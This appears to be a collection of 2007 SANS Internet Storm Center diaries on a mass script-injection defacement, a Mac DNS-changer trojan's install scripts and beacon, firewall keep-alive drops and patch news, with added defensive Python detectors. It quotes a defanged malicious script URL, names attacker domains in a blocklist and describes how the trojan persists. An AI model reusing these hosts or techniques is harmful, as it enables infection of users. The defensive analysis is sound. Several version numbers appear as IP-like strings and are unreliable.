(And by the way, if you need bulk access to DShield data, please ask. Spidering the site is just not very efficient, and you will run into some anti-harvesting traps that send you in circles.)
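One check that does not depend on knowing a search engine's address ranges is the reverse-then-forward DNS verification: look up the PTR record of the client IP, require the name to be under a domain the search engine owns, and then resolve that name forward and confirm the original IP is among the answers (a PTR record alone is trivially forgeable by whoever controls the reverse zone). The following Python is an added example, not part of the original diary or any DShield tooling; the log lines, the 192.0.2.x/198.51.100.x/203.0.113.x addresses and the DNS answers are constructed so the code runs offline, and the real resolver functions are included for use against a live log.

```python
import re
import socket

# Constructed combined-log-format lines standing in for the diary's entries:
# a search appliance, a real Googlebot, and a client that only claims to be one.
SAMPLE_LOG = """\
203.0.113.10 - - [09/Nov/2007:15:24:35 +0000] "GET /portreportascii.html?date=2007-11-09 HTTP/1.0" 200 500572 "-" "gsa-crawler (Enterprise; EXAMPLE-ID; user@example.com)" "-"
192.0.2.25 - - [09/Nov/2007:15:24:37 +0000] "GET /date.html?port=47109&date=2007-10-25 HTTP/1.1" 200 7538 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
198.51.100.7 - - [09/Nov/2007:15:25:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed DNS data (assumption, not real records): 192.0.2.25 has a PTR that
# forward-resolves back to itself; 198.51.100.7 carries a forged PTR whose A record
# points somewhere else.
FAKE_PTR = {
    "192.0.2.25": "crawl-192-0-2-25.googlebot.com",
    "198.51.100.7": "crawl-192-0-2-25.googlebot.com",
}
FAKE_A = {"crawl-192-0-2-25.googlebot.com": ["192.0.2.25"]}

def fake_reverse(ip):
    return FAKE_PTR.get(ip)

def fake_forward(host):
    return FAKE_A.get(host, [])

def real_reverse(ip):
    """PTR lookup through the system resolver; swap in for fake_reverse on a live log."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except socket.herror:
        return None

def real_forward(host):
    """Forward (A record) lookup through the system resolver."""
    try:
        return socket.gethostbyname_ex(host)[2]
    except socket.gaierror:
        return []

# Domains Google documents for its crawler hostnames; the leading dot prevents
# a lookalike such as evilgooglebot.com from passing the suffix test.
GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")

def is_verified_googlebot(ip, reverse_lookup, forward_lookup):
    """Two-step check: PTR name must be under a Google domain, and that name's
    forward lookup must include the original IP."""
    host = reverse_lookup(ip)
    if not host or not host.lower().endswith(GOOGLE_SUFFIXES):
        return False
    return ip in forward_lookup(host)

def classify_log(log_text, reverse_lookup=fake_reverse, forward_lookup=fake_forward):
    """Return {ip: verdict}: 'verified' or 'spoofed' for requests whose user agent
    claims Googlebot, 'other-crawler' for anything else that calls itself a bot."""
    verdicts = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ua = m.group("ip"), m.group("ua")
        if "Googlebot" in ua:
            ok = is_verified_googlebot(ip, reverse_lookup, forward_lookup)
            verdicts[ip] = "verified" if ok else "spoofed"
        elif re.search(r"crawler|bot|spider", ua, re.I):
            verdicts[ip] = "other-crawler"
    return verdicts

if __name__ == "__main__":
    for ip, verdict in classify_log(SAMPLE_LOG).items():
        print(ip, verdict)
```

Against a real access log, call classify_log(text, real_reverse, real_forward); the spoofed verdict is the one worth alerting on, since a client that claims a crawler identity it cannot prove has no legitimate reason to do so.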
Johannes B. Ullrich
Chief Research Officer, SANS Technology Institute
As handlers we tend to have a tiny stubborn streak (no, really, we do; just ask our respective partners, they’ll confirm it). So in the fine tradition of "I wonder what else is going on" I dug a little bit further.
The more I looked the more familiar it seemed. Remember the Super Bowl infection back in February? Mass defacement, using SQL Injection, downloading a file (although almost everything does that nowadays), script is #.js, etc. It all sounded a bit the same. So was there a link?
Seems there might be at that. There are various sites that will let you have a look and see what other sites are or were hosted on a particular IP address. The address that yl18.net points at shows that other web sites hosted on the same server as yl18.net are:
- 137wg.com
- Worldofwarcraftn.com
- Zj5173.com
When you look at the title of the site 137wg.com you will find a reference to the newasp.com.cn domain (remember ANI?)
Following the yellow brick road on yl18.net you end up adding to the counter hosted in the domain cnzz.com, strangely familiar from both the Super Bowl and ANI issues earlier this year. So it would seem that there may be a link.
The good news so far is that the executable being downloaded seems to be detected by most AV products. The sad news is that when I checked the other day the number of infected sites was about 30K; now it is about 52K.
If you use URL blockers in your organisation, then you may want to block the four domains and your users will be protected for at least the next little while.
Mark H - Shearwater
One of the things I’ve been working on recently included monitoring dropped sessions on an internal firewall. This firewall (along with the others) is positioned between an application server and a database server. The firewall allows only incoming connections from ephemeral ports on the application server to port 1521 on the database server (that’s Oracle SQLNET). The following figure shows the setup:
The dropped packets log contained something interesting. From time to time, the firewall dropped some packets coming from the database servers, as shown below:
Source IP:Port Destination IP:Port
This was pretty strange, as the database server should never open new connections, so I did some further research. I set up sniffers on both sides and analyzed the captured packets. That allowed me to reconstruct what happened here; the example below shows a session that starts at 10:00 AM:
- 10:00 – The application server connects to the database server on port 1521 (SQLNET). The connection is established from an ephemeral port, 31578. After a normal TCP three-way handshake the application server starts sending queries.
- 11:00 – The application server sends its last query to the database server, which replies with the results. The application server sends an empty ACK packet acknowledging that it received this packet.
- 12:00 – One hour after the last packet was seen in the TCP session, the internal firewall’s idle timeout causes it to delete this session from its stateful connection table. This means that any future packets claiming to belong to this session will be dropped.
- 13:00 – The database server sends an ACK packet to the application server. This is the TCP keep-alive mechanism described in RFC 1122: by default, after a session has been idle for 2 hours, the OS on the database server sends an ACK packet to see if the remote side is still up. If no answer is received, it backs off exponentially, sending further ACK packets, and after that it drops the session.
So, the problem here was caused by the application server not properly closing a session it no longer uses, and not using TCP keep-alives itself. It was interesting to see that the application server used the session for exactly 1 hour.
In order to fix this properly we would have to work with the vendor of the application server to see why it stops using connections without closing them. An easier fix was to increase the timeout of the firewall’s stateful connection table to 9000 seconds (2.5 hours), of course after carefully examining the impact of this change on the firewall, since it will use more memory holding similar idle sessions. This allowed the ACK packets (TCP keep-alives) sent by the database server through the firewall, and the application server correctly replied to them.
Why all this, you might ask? This was one example of why we should spend time cleaning up our local networks as well. During this exercise we found heaps of incorrectly configured servers and/or applications that people had lived with for ages, without even knowing what was going on at the lower network layers.
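To make the interaction between the firewall’s idle timeout and the TCP keep-alive timer concrete, here is an added example (not from the original diary and not any firewall vendor’s code) that models a minimal stateful connection table in Python and replays the timeline above. The server addresses 10.0.1.10 and 10.0.2.20 are constructed; the ephemeral port 31578, the one-hour firewall timeout and the 9000-second fix come from the diary, and the 2-hour keep-alive idle time is the RFC 1122 default mentioned above.

```python
from collections import namedtuple

# Constructed addresses for the application server and the database server.
APP, DB, DB_PORT = "10.0.1.10", "10.0.2.20", 1521

Packet = namedtuple("Packet", "t src sport dst dport flags")

class StatefulFirewall:
    """Toy model of the internal firewall in the diary: a new session may only be
    opened by APP from an ephemeral port to DB:1521; once the session is in the
    state table, packets in either direction pass until the entry has been idle
    longer than idle_timeout seconds, at which point it is removed."""

    def __init__(self, idle_timeout):
        self.idle_timeout = idle_timeout
        self.table = {}      # (client, cport, server, sport) -> time of last packet
        self.dropped = []

    def _expire(self, now):
        for key, last_seen in list(self.table.items()):
            if now - last_seen > self.idle_timeout:
                del self.table[key]

    def process(self, pkt):
        self._expire(pkt.t)
        forward = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if forward in self.table:
            key = forward
        elif reverse in self.table:
            key = reverse
        elif ("S" in pkt.flags and pkt.src == APP and pkt.sport >= 1024
              and pkt.dst == DB and pkt.dport == DB_PORT):
            key = forward                      # policy permits this new session
        else:
            self.dropped.append(pkt)           # unknown session or forbidden direction
            return "DROP"
        self.table[key] = pkt.t                # refresh the idle timer
        return "ALLOW"

KEEPALIVE_IDLE = 7200   # RFC 1122 default: first keep-alive probe after 2 hours idle

def simulate(firewall_timeout, eph_port=31578):
    """Replay the diary's timeline (t is seconds after 10:00) and return the
    firewall verdict for each step; 'keepalive' is the DB server's 13:00 ACK."""
    fw = StatefulFirewall(firewall_timeout)
    last_query = 3600                           # 11:00
    timeline = [
        ("handshake-syn",    Packet(0, APP, eph_port, DB, DB_PORT, "S")),
        ("handshake-synack", Packet(0, DB, DB_PORT, APP, eph_port, "SA")),
        ("handshake-ack",    Packet(0, APP, eph_port, DB, DB_PORT, "A")),
        ("last-query",       Packet(last_query, APP, eph_port, DB, DB_PORT, "PA")),
        ("last-result",      Packet(last_query, DB, DB_PORT, APP, eph_port, "PA")),
        ("final-ack",        Packet(last_query, APP, eph_port, DB, DB_PORT, "A")),
        ("keepalive",        Packet(last_query + KEEPALIVE_IDLE, DB, DB_PORT, APP, eph_port, "A")),
    ]
    return {name: fw.process(pkt) for name, pkt in timeline}

if __name__ == "__main__":
    for timeout in (3600, 9000):
        print(f"firewall idle timeout {timeout}s: keep-alive {simulate(timeout)['keepalive']}")
```

With the original 3600-second timeout the state entry is gone by the time the 13:00 probe arrives, so the keep-alive is logged as a drop from the database side; with 9000 seconds the entry survives the 7200-second idle gap and the probe passes. The model also shows why the drops looked alarming: a SYN from the database server would be refused by the same policy, so the log line alone cannot tell a keep-alive from a genuine outbound connection attempt.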
Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40 000 pages across the internet:
script src="hXXp://yl 18.net/0.js"
This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.
Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti-virus coverage differed greatly between the binaries. Below is the VirusTotal output for one sample:
AhnLab-V3 2007.11.7.0 2007.11.06 -
AntiVir 184.108.40.206 2007.11.06 TR/PSW.OnlineGames.gul
Authentium 4.93.8 2007.11.05 -
Avast 4.7.1074.0 2007.11.05 -
AVG 220.127.116.113 2007.11.06 PSW.OnlineGames.QCP
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul
ClamAV 0.91.2 2007.11.06 -
DrWeb 4.44.0.09170 2007.11.06 Trojan.PWS.Gamania.5503
eSafe 18.104.22.168 2007.10.28 suspicious Trojan/Worm
eTrust-Vet 31.2.5270 2007.11.05 -
Ewido 4.0 2007.11.06 -
FileAdvisor 1 2007.11.06 -
Fortinet 22.214.171.124 2007.10.19 -
F-Prot 126.96.36.199 2007.11.06 -
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
Ikarus T188.8.131.52 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul
Kaspersky 184.108.40.206 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
McAfee 5157 2007.11.06 -
Microsoft 1.3007 2007.11.06 -
NOD32v2 2641 2007.11.06 -
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ
Panda 220.127.116.11 2007.11.06 Suspicious file
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence
Rising 20.17.12.00 2007.11.06 -
Sophos 4.23.0 2007.11.06 Mal/Packer
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious
Symantec 10 2007.11.06 Infostealer.Gampass
TheHacker 18.104.22.168 2007.11.06 -
VBA32 22.214.171.124 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul
This type of widespread attack can incur a serious toll and requires follow up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:
- Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
- If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
- We gather samples of the affected malicious code and distribute it to anti virus vendors to have them build coverage;
- If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.
We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.
As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.
This is a problem – most registrars do not really care what a domain is used for. Generally malicious domains are however paid for with fake credit cards, and if this can be identified, they have the legal ability to disable the domain.
These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross site scripting, and are infecting their users.
If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.
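Beyond blocking at the gateway, site owners want to know whether their own pages carry the injected tag. The following Python is an added example, not code from the ISC or from the diary: it walks the script tags of an HTML document and reports any whose source host is on a blocklist (here the four domains named in the two diaries above: yl18.net, 137wg.com, worldofwarcraftn.com and zj5173.com) and, separately, any external script host that is neither the site itself nor explicitly allowed, which is what an injected tag on a new domain would look like. The sample page and the hosts www.example.com and static.cdn-example.net are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains named in the diaries above; subdomains of these are matched as well.
BLOCKLIST = {"yl18.net", "137wg.com", "worldofwarcraftn.com", "zj5173.com"}

# Constructed page: two legitimate scripts, one injected tag on a blocklisted
# domain, and one third-party script the site owner has not vetted.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script type="text/javascript" src="http://www.example.com/js/menu.js"></script>
</head><body>
<p>Welcome</p>
<script src="http://yl18.net/0.js"></script>
<script src="http://static.cdn-example.net/lib.js"></script>
</body></html>
"""

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag together with its line number."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append((self.getpos()[0], value.strip()))

def host_of(src):
    """Host name of a script URL, or None for a relative path served by the site."""
    if src.startswith("//"):
        src = "http:" + src            # protocol-relative URL
    elif "://" not in src:
        return None
    host = urlparse(src).hostname
    return host.lower() if host else None

def is_blocklisted(host):
    return any(host == d or host.endswith("." + d) for d in BLOCKLIST)

def scan_html(html, site_host, allowed_hosts=()):
    """Return (line, src, reason) for every script source that is blocklisted or
    loaded from an external host that is neither the site nor on the allow list."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for line_no, src in collector.sources:
        host = host_of(src)
        if host is None:
            continue
        if is_blocklisted(host):
            findings.append((line_no, src, "blocklisted"))
        elif host != site_host.lower() and host not in allowed_hosts:
            findings.append((line_no, src, "unknown-external"))
    return findings

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, "www.example.com"):
        print(*finding)
```

Run it over a crawl of your own site (or over database-backed templates, since the diary notes the injection most likely arrived through SQL injection) and treat every unknown-external hit as something to either add to the allow list or investigate.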
Maarten Van Horenbeeck
Apple has released Quicktime 7.3 which contains fixes for a number of serious vulnerabilities:
- A memory corruption bug which can be triggered by a maliciously crafted movie. It could potentially result in arbitrary code execution (CVE-2007-2395).
- A heap overflow in the use of Sample Table Sample Descriptor atoms, which can be triggered through maliciously crafted movie files. It could potentially result in arbitrary code execution (CVE-2007-3750).
- Vulnerabilities in Quicktime for Java which could allow untrusted applets to obtain elevated privileges (CVE-2007-3751).
- Two bugs in PICT file processing, potentially resulting in arbitrary code execution (CVE-2007-4672).
- A bug in QTVR movie file parsing which could result in arbitrary code execution (CVE-2007-4675).
- A bug in the parsing of color table atoms which could result in arbitrary code execution (CVE-2007-4677).
The impact of each bug varies based on the platform, but all of Mac OS X, Vista and XP SP2 are affected. Get more information at Apple.
It appears partial information on the vulnerability and exploit has been in the wild since mid October, and it is being exploited in a limited number of incidents.
According to the advisory, this is a local attack which allows privilege escalation. While plans for an official Microsoft supplied patch are in the works, Macrovision has released an update from their website which allows you to mitigate this issue.
Maarten Van Horenbeeck
- the site calling for it has tried to do so before without success
- November 11th is also the official start of carnival, at least in Germany, and a day for hoaxes
- Even if something is going to happen, I doubt it will be more than a lame DoS attack
In the past, political attacks like this resulted in some more or less manual DoS attacks. Expect things like calls for supporters to reload particular "offensive" websites, or use the ping command to flood them. In some cases, supporters may be asked to install trojans. But chances are that the usual criminals will just take advantage of this and use it as a trick to install the regular criminal bots.
Johannes B. Ullrich, Ph.D.
Chief Research Officer, SANS Technology Institute.
A complete list will be presented at the CDI conference in December and we will post it here after the conference.
Johannes B. Ullrich, Ph.D.
Chief Research Officer, SANS Technology Institute
A last minute reminder that in some regions (including the United States, Canada, the Bahamas, Bermuda, and the French territory of Saint Pierre and Miquelon, and likely others that I have missed) the clocks will be set back. See Marc's entry from last week for more details.
Be sure to check your appliances, unpatched computers and PDAs. It's also a good time to change the batteries in your fire/smoke alarms.
DNS name servers that don't forward their requests to other DNS servers need to know some of the IP addresses of the root name servers in order to find their way to the rest of the information. They either have this knowledge built in or use an external file containing an initial mapping.
The "L.ROOT-SERVERS.NET" root name server changed its IP address, and hence some updating to the hints could be useful.
For the record: this isn't an urgent update. Consider it an opportunity to verify your name server software is up to date on patches and perhaps to learn a few interesting bits on how the DNS system works.
A local privilege escalation problem in a security product like anti-virus software typically sets off quite a few alarms with security people, as the software is installed to make machines more secure, not less.
Mac versions of Symantec's anti-virus software have a local privilege escalation problem. It allows members of the admin group to gain "root" powers.
Still, members of an admin group can use sudo to get a local shell with root powers anyway, hence we're not likely to lose much sleep over this one. That is, until it gets automated in a second-stage exploit.
The expected stability update to Firefox is out.
It fixes some known problems in version 126.96.36.199, but nothing flagged as security related.
Funny, stability seems to be like availability. Probably proof that quite a few still don't consider availability an integral part of security ...
Mankind has always had a desperate need to identify its environment. Only by studying our surroundings have we been able to make changes that help us live better. This is also valid for the virtual world we ourselves created.
Complicating matters though, there are multiple parallel maps which essentially cover the same infrastructure, but from different points of view. There are network diagrams, huge maps of the internet and those showing how individual cities interconnect.
At another layer, there are now maps that try to chart how people interrelate – social networks, as we call them. Other maps identify how suspected criminal networks operate or how they structure domains used in specific attacks.
One major issue with maps is that we tend to consider them accurate. When we use maps in our daily lives, they generally show us the way from point A to point B, and they are always right. This is because of a fundamental feedback loop. When I cross from point A to point B, others have likely crossed from point C to point D while meeting the same road. If the map is inaccurate, errors get reported and fixed very smoothly. There’s a lot of traffic, after all.
Our network maps, however, compare much better to those built hundreds of years ago. They were created by a single person visiting a new region or continent, and contained errors. From 1605 to 1722, for example, California was regularly painted on maps as an island.
In addition, maps are often used to sell beliefs. They aren’t necessarily wrong, they just present the world as it exists in the cartographer’s mind. Try grabbing maps of the Spratly Islands from various East Asian countries, or maps of the Middle East from Israel and Syria.
As security professionals, we all meet organizations maintaining network diagrams that do not fully match reality. Their perimeter is not where they thought it was, or various hosts are exposed in ways not fully realized. Making good risk management decisions starts with great asset management, and this requires you to keep your maps up to date. From experience, it appears to me that smaller organizations have problems keeping smaller diagrams up to date, while larger organizations have really good detailed diagrams for individual solutions, but lack insight into their overall, distributed network environment.
Some ways to remediate this:
- Recognize that diagrams may not be accurate by assigning a confidence rating to each of them, and then work to increase confidence through verification;
- Use vulnerability management such as scanning to identify assets. However, always take into account their limitations (discovery can be slow, is always incomplete – even when you scan 65535 ports on a variety of protocols);
- Network IDS can sometimes contribute if you're looking beyond the individual alerts but at overall flows.
I'm very interested in hearing from you on measures you've taken to deal with these issues.
Maarten Van Horenbeeck
On behalf of the volunteer handlers of the SANS Internet Storm Center, I'd like to pass along our deep appreciation to all of the readers who sent in hundreds of comments and ideas during the past month! As promised, below is an index to all of the Cyber Security Awareness Month diaries that were published over the past 31 days. We are working on producing a full document that has all of the submissions (cleaned up, reformatted, and sanitized if needed) that were received. As you can imagine it will be a while before it's ready for downloading due to the volume of information that was sent to us. If you have any final thoughts or want to add some additional tips to the subjects, please send them to us via our contact form.
1. Establishing a User Awareness Training Program
1 Penetrating the "This Does Not Apply To Me" Attitude
2 Multimedia Tools, Online Training, and Useful Websites
3 Getting the Boss Involved
4 Enabling the Road Warrior
5 Social Engineering and Dumpster Diving Awareness
6 Developing and Distributing Infosec Policies
2. Best Practices
7 Host-based Firewalls and Filtering
8 Anti-Virus, Anti-Spyware, and Other Protective Software
9 Access Controls, Including Wireless, Modems, VPNs, and Physical Access
10 Authentication Mechanisms (Passwords, Tokens, Biometrics, Kerberos, NTLM, Radius)
11 File System Backups
12 Managing and Understanding Logs on the Desktop or Laptop (AV, Firewall, or System Logs)
13 Patching and Updates
3. Hardware/Software Lockdown
14 Data Encryption
15 Protecting Laptops
16 Protecting Portable Media like USB Keys, iPods, PDAs, and Mobile Phones
17 Windows XP/Vista Tips
18 Mac Tips
19 Linux Tips
20 Software Authenticity (Digital Signatures, MD5, etc.)
4. Safe Internet Use
21 Understanding Online Threats, Phishing, Fraud, Keystroke Loggers
22 Detecting and Avoiding Bots and Zombies
23 Using Browsers, SSL, Domain Names
24 Not All Patches Are Released on a Tuesday
25 Using Email, PGP, X509 Certs, Attachments, Instant Messaging and IRC
26 Safe File Swapping
27 Online Games and Virtual Worlds
5. Privacy and Protection of Intellectual Property
29 Insider Threats
30 Blogging and Social Networking
31 Legal Awareness (Regulatory, Statutory, etc.)
Marcus H. Sachs
Director, SANS Internet Storm Center
We received some reports of various companies (http://www.intego.com/news/ism0705.asp) reporting about a Mac DNS changer Trojan in the wild. As I happened to receive a sample of it, I decided to analyze it quickly.
The whole Trojan is relatively simple and works almost exactly the same as its brother for Windows operating systems. When executed, the Trojan changes the DNS settings on the machine and reports back to the C&C server.
While the Trojan is relatively simple and not a big threat, two things came to my mind immediately. First, the bad guys are now taking the Mac seriously – this is a professional attempt at attacking Mac systems (and it could have been much more damaging, really). The second thing, which the folks at Sunbelt noticed (http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html), is that when they sent a sample to VirusTotal there were 0 (zero, nada, zilch) products that detected it.
So, let’s see what really happens here. The “social engineering” part has been seen a million times – an unsuspecting user visits a web site with a movie on it; however, he needs to download a new codec in order to view it. On Windows, that new codec is typically a PE executable; for the Mac the bad guys prepared a DMG archive (DMG files are like ISOs). The user is then prompted to install the package, and during this process he will have to supply administrator credentials. Yep, it’s game over from this point in time (and the attack is exactly the same as on Windows – keep in mind that these users *will* willingly supply these credentials).
Now that we know what happens, let’s see how this whole thing works. I analyzed this on a Linux machine so I first had to convert the DMG file into something Linux can read (an ISO). There is a simple dmg2img utility available from http://vu1tur.eu.org/tools/ that does the job perfectly.
Once you converted the file to an ISO image, you can mount it and see what’s going on. The most important directory is Resources which contains scripts that are executed before and after the installation. The files that get installed are kept in the Archive.pax.gz file – it’s a gzip compressed cpio file.
The preinstall/preupgrade files from the Resources directory get executed immediately after the installation starts (and they do the main job). These two files are just shell scripts which change the DNS server settings on the machine by using the scutil utility. Here’s what they set the DNS servers to:
(Yes, the IP addresses are familiar). The scripts also create a new cronjob that gets executed every minute. The cron job executes a file called plugins.settings, which is just a copy of the preinstall/preupgrade files – it makes sure that the DNS servers stay as those above and that the cronjob is not removed.
Finally, the postinstall/postupgrade scripts execute a Perl script called sendreq. This Perl script collects some information about the local machine (uname –p and hostname), Base64 encodes them and sends the information to the C&C server (188.8.131.52). An interesting thing is that this gets submitted as the Accept-Language: header so it should be easy to write a Snort signature to catch this.
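An HTTP-layer check for this beacon is straightforward: a genuine Accept-Language header is a comma-separated list of language ranges with optional q-values, so a value that fails that grammar but decodes cleanly as Base64 into printable text is the pattern the Snort signature mentioned above would key on. The following Python is an added example, not the diary’s or any vendor’s code; the request text and the host name victim.local are constructed, and the exact payload layout (uname -p output and hostname joined by a space) is an assumption, since the diary only states which two values are collected.

```python
import base64
import re

# Language-range grammar (RFC 4647 style) with an optional ;q= weight,
# e.g. "en-US,en;q=0.5" or "*;q=0.1".
LANG_TAG_RE = re.compile(
    r"^(\*|[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*)"
    r"(?:\s*;\s*q=(?:0(?:\.\d{0,3})?|1(?:\.0{0,3})?))?$"
)

def parse_headers(raw_request):
    """Split a raw HTTP request into (request_line, {lower-case name: value})."""
    head, _, _ = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def valid_accept_language(value):
    return all(LANG_TAG_RE.match(part.strip()) for part in value.split(","))

def looks_like_base64_payload(value):
    """Decoded text if the value is well-formed Base64 yielding printable ASCII, else None."""
    compact = "".join(value.split())
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact) or len(compact) % 4:
        return None
    try:
        decoded = base64.b64decode(compact, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None
    return decoded if decoded.isprintable() else None

def inspect_request(raw_request):
    """Classify one request: ('ok', None), ('beacon', decoded_text) or ('malformed', None)."""
    _, headers = parse_headers(raw_request)
    value = headers.get("accept-language")
    if value is None or valid_accept_language(value):
        return ("ok", None)
    decoded = looks_like_base64_payload(value)
    return ("beacon", decoded) if decoded else ("malformed", None)

def build_request(accept_language):
    """Constructed request skeleton; 192.0.2.1 stands in for the C&C address."""
    return ("GET / HTTP/1.1\r\n"
            "Host: 192.0.2.1\r\n"
            "User-Agent: curl/7.16\r\n"
            f"Accept-Language: {accept_language}\r\n\r\n")

# Assumed beacon layout: "<uname -p> <hostname>", Base64 encoded.
CONSTRUCTED_BEACON = base64.b64encode(b"i386 victim.local").decode("ascii")
SAMPLE_NORMAL_REQUEST = build_request("en-US,en;q=0.5")
SAMPLE_BEACON_REQUEST = build_request(CONSTRUCTED_BEACON)

if __name__ == "__main__":
    for name, req in (("normal", SAMPLE_NORMAL_REQUEST), ("beacon", SAMPLE_BEACON_REQUEST)):
        print(name, inspect_request(req))
```

The grammar check runs first so that ordinary short tags such as "de" are never mistaken for Base64; anything that is neither a language list nor decodable is reported as malformed rather than ignored, since a proxy log full of malformed Accept-Language values from one host is itself worth a look.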
As I said, although the Trojan is really simple, it could have done much worse things (once the installer script has root privileges, it is game over anyway). This malware shows that we must not ignore Mac machines, and that Mac users should not think they are invulnerable just by using a Mac and that they can click on absolutely everything.
From the network point of view, pay attention to DNS traffic: any DNS requests that leave your network and do not come from your own DNS servers are coming from either infected or misconfigured machines.